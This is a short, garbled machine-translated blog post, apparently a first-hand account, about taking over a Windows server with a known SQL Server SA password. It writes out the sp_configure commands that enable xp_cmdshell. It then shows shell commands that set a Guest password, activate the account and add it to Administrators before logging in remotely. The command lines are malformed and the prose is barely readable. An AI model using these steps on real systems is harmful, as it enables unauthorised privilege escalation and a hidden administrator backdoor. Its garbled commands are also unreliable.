Met the villain, took the server away
Only the SA account password for SQL Server in your own hands
Fuzzy Remember to use this account to extract the right to read the file
Baidu, found the relevant information a pile of
A lot of tools have been found, not grammatical errors or inadequate authority.
Helpless under installed SQL Server R2 directly to operate
Smooth connection up, see have master this library.
Go straight to the point.
Here is to use is xp_cmdshell This stored procedure, is the MSSQL has SA permission to mention the right device, but experienced administrators generally use a variety of ways to prohibit ordinary users of the use of it
Try opening xp_cmdshell in a normal way:
EXEC sp_configure ' show advanced options ', 1; RECONFIGURE; EXEC sp_configure ' xp_cmdshell ', 1; RECONFIGURE; exec sp_configure
It seems that luck is still good, xp_cmdshell smoothly opened. You can then execute the cmd command directly:
exec ' net user Guest Qwer123456789 ' exec ' NET user Guest/active:yes ' exec ' net localgroup Administrators Guest/add '
It's smooth.
No obstacles.
Finally, attach a remote login
Take advantage of the SA account of MSSQL to get the server right